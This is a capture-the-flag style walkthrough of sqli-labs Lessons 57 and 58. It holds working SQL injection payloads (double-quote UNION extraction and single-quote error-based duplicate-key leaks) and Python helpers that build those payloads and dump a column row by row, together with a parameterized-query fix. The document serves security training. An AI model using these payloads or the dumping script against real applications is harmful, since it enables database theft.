Lesson-57
This challenge is a double-quote GET injection; usable techniques are UNION queries, boolean-based blind and time-based blind.
Probe: id=1"  (a single quote, id=1', does not break out, because the value is wrapped in double quotes)
The target code, in outline:
if($_POST['reset']):
    setcookie('challenge',' ',time()-3600000);
else:
    if($_COOKIE['challenge']):
        $sessid=$_COOKIE['challenge'];
    else:
        $expire = time()+60*60*24*30;
        $hash = data($table,$col);            // random table/column names tied to this cookie
        setcookie("challenge", $hash, $expire);
    if($_GET['id']):
        $id=$_GET['id'];
        $id='"'.$id.'"';                      // value wrapped in double quotes, not escaped
        if(next_tryy() >= ($times+1)): ...    // attempt counter; the challenge allows a fixed number of tries
        $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
        if the query returns a row:
            print the row;
        else:
            print the error;
Note: exploitation is the same as in Lesson 54; the only differences are that the value is wrapped in double quotes instead of single quotes and that the number of allowed attempts rises from 10 to 14.
Confirm the injection point (the query must return normally):
id=1"--+
Determine the number of columns:
id=1" order by 3--+   // returns normally
id=1" order by 4--+   // returns an error
So the query has 3 columns (the page originally said 4, which contradicts the probe above). Use UNION SELECT to see which positions are echoed; the later payloads place the data in position 3:
id=-1" union select 1,2,3--+
Query the table names:
id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
Query the column names:
id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='mup8sgqrlo'--+
Query the key:
id=-1" union select 1,2,group_concat(secret_EGMD) from mup8sgqrlo--+
Key retrieved: UFLHEB2MKHMJWM97fXAajgWB
Note that the table and column names are regenerated for every new challenge cookie, so substitute the names you actually read back in the previous steps.
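The Lesson 57 walkthrough above, replayed as an added example (not code from the page or from sqli-labs): a Python script that emulates the handler's double-quote wrapping against an in-memory SQLite database, runs the ORDER BY probe and the three UNION steps, and then binds the same payload as a parameter. The schema and rows are constructed, SQLite stands in for MySQL, and sqlite_master / pragma_table_info replace the information_schema lookups.

```python
import sqlite3

# Constructed stand-in for the challenge database: the fixed security.users table plus
# the randomly named table/column from the walkthrough. SQLite plays the role of MySQL,
# so the information_schema lookups are swapped for sqlite_master and pragma_table_info.
SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
CREATE TABLE mup8sgqrlo (secret_EGMD TEXT);
INSERT INTO mup8sgqrlo VALUES ('UFLHEB2MKHMJWM97fXAajgWB');
"""

ERROR = "ERROR"  # marker for the challenge's "print the error" branch


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """Mirrors Lesson 57: $id = '"'.$id.'"' and the result pasted into the SQL text.
    SQLite treats an unknown double-quoted token as a string literal (its legacy
    behaviour), which is what lets the MySQL-style double-quote wrapping be replayed."""
    sql = f'SELECT * FROM users WHERE id="{id_param}" LIMIT 0,1'
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return (ERROR, str(exc))


def safe_lookup(conn, id_param):
    """Hardened form: id is a bound parameter, so quotes and UNION are just text."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_param,)).fetchone()


def is_error(result):
    return result is not None and result[0] == ERROR


def column_count(conn, budget=14):
    """ORDER BY probe: the first n that errors means the query has n-1 columns.
    Stops at `budget` because the challenge allows only 14 attempts in total."""
    for n in range(1, budget + 1):
        if is_error(vulnerable_lookup(conn, f'1" order by {n}--')):
            return n - 1
    return None


def union_walk(conn):
    """Replays the page's three UNION queries (SQLite equivalents of the
    information_schema lookups) and returns what the attacker reads off column 3."""
    tables = vulnerable_lookup(conn, '-1" union select 1,2,group_concat(name) '
                               "from sqlite_master where type='table'--")[2].split(",")
    target = next(t for t in tables if t != "users")   # the randomly named table
    column = vulnerable_lookup(conn, '-1" union select 1,2,group_concat(name) '
                               f"from pragma_table_info('{target}')--")[2]
    secret = vulnerable_lookup(conn, f'-1" union select 1,2,group_concat({column}) '
                               f"from {target}--")[2]
    return {"table": target, "column": column, "secret": secret}


if __name__ == "__main__":
    db = connect()
    print("columns:", column_count(db))
    print("loot:", union_walk(db))
    print("same payload, parameterized:", safe_lookup(db, '-1" union select 1,2,3--'))
```

Run it directly to print the column count, the extracted table, column and secret, and the parameterized lookup's result (no row). The probe loop stops at 14 because that is the challenge's attempt budget; the fix is the bound parameter in safe_lookup, not filtering of quote characters.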
Lesson-58
This challenge is a single-quote GET injection; usable techniques are error-based injection, boolean-based blind and time-based blind.
Probe: id=1'
The target code, in outline:
if($_POST['reset']):
    setcookie('challenge',' ',time()-3600000);
else:
    if($_COOKIE['challenge']):
        $sessid=$_COOKIE['challenge'];
    else:
        $expire = time()+60*60*24*30;
        $hash = data($table,$col);            // random table/column names tied to this cookie
        setcookie("challenge", $hash, $expire);
    if($_GET['id']):
        $id=$_GET['id'];
        if(next_tryy() >= ($times+1)): ...    // attempt counter; the challenge allows a fixed number of tries
        $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
        if the query returns a row:
            $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
            $pass = array_reverse($unames);
            print the result (drawn from the arrays above, not from the row);
        else:
            print_r(mysql_error());
Note: this challenge prints only entries from the $unames and $pass arrays, and $pass is just $unames reversed, so a UNION query cannot bring our data onto the page. Error-based injection works instead, because the output of mysql_error() is printed.
Confirm the injection point (the query must return normally):
id=1'--+
Query basic information. Each payload forces a duplicate key in the GROUP BY temporary table, and the duplicated key, the value followed by ~1 (0x7e is ~), is printed in the error message:
id=1' and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1' and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1' and (select count(*) from information_schema.tables group by concat((select database()),0x7e,floor(rand(0)*2)))--+
Query the table names (step through them with limit 0,1, limit 1,1, ...):
id=1' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
Query the column names (here the third column, limit 2,1, holds the secret):
id=1' and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='me487dxhor' limit 2,1),0x7e,floor(rand(0)*2)))--+
Query the key:
id=1' and (select count(*) from information_schema.tables group by concat((select secret_NMS4 from me487dxhor limit 0,1),0x7e,floor(rand(0)*2)))--+
Key retrieved: mx7XGPasBPeRQKfCQJ7LEwt1
Note that the table and column names are regenerated for every new challenge cookie, so substitute the names you actually read back in the previous steps.
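The error-based steps above, as an added example that is not part of the original page: a Python helper that builds the floor(rand(0)*2) payload around any scalar subquery, parses the leaked value out of MySQL's duplicate-entry message, and walks a column one row per request. The sample error strings and the `send` stub are constructed; nothing here talks to a server.

```python
import re

# Why the payload leaks data: rand(0) is seeded, so floor(rand(0)*2) always yields the
# sequence 0,1,1,0,1,1,... While GROUP BY fills its temporary table it computes the
# key, finds it missing, re-evaluates it (taking the next value) and inserts; the
# second "1" then collides and MySQL aborts with
#   Duplicate entry '<value>~1' for key 'group_key'
# which sqli-labs prints via mysql_error(). It needs at least three rows to group
# over, which is why the walkthrough counts information_schema.tables.


def error_payload(subquery, quote="'"):
    """The page's payload shape around an arbitrary scalar subquery. --+ is used
    because MySQL needs whitespace after -- and the + decodes to a space in the URL."""
    return (f"1{quote} and (select count(*) from information_schema.tables "
            f"group by concat(({subquery}),0x7e,floor(rand(0)*2)))--+")


def row_payload(column, table, index, quote="'"):
    """Payload for row `index` of table.column (LIMIT index,1): one request per value."""
    return error_payload(f"select {column} from {table} limit {index},1", quote)


# MySQL 5.x names the key 'group_key'; 8.0 prints '<group_key>'.
_DUPLICATE = re.compile(r"Duplicate entry '(.*)~[01]' for key '<?group_key>?'")


def leaked_value(error_text):
    """Returns the value the duplicate-entry error leaks, or None when the response
    is not that error (syntax error, or no error because the subquery was NULL)."""
    m = _DUPLICATE.search(error_text or "")
    return m.group(1) if m else None


def dump_column(column, table, send, quote="'", max_rows=50):
    """Walks table.column one row per request. `send` takes the id value and returns
    the page's error text (an HTTP client in practice; a stub in the demo). Stops at
    the first row with no duplicate-entry error, which is how LIMIT running past the
    last row shows up (NULL subquery => NULL key, no collision). Each call costs one
    attempt against the challenge's next_tryy() counter."""
    values = []
    for i in range(max_rows):
        value = leaked_value(send(row_payload(column, table, i, quote)))
        if value is None:
            break
        values.append(value)
    return values


# Constructed sample responses in the shape mysql_error() prints them.
SAMPLE_ERRORS = {
    "user": "Duplicate entry 'root@localhost~1' for key 'group_key'",
    "version": "Duplicate entry '5.7.26~1' for key '<group_key>'",
    "secret": "Duplicate entry 'mx7XGPasBPeRQKfCQJ7LEwt1~1' for key 'group_key'",
    "syntax": "You have an error in your SQL syntax; check the manual ...",
}

if __name__ == "__main__":
    print(error_payload("select user()"))
    for name, text in SAMPLE_ERRORS.items():
        print(name, "->", leaked_value(text))
```

The quote parameter exists because the same payload shape serves the double-quote variant of Lesson 57 (quote='"'); only the wrapping character changes. Because every row costs one request, and the challenge counts attempts, pull the table and column names first and spend the remaining budget on the secret column only.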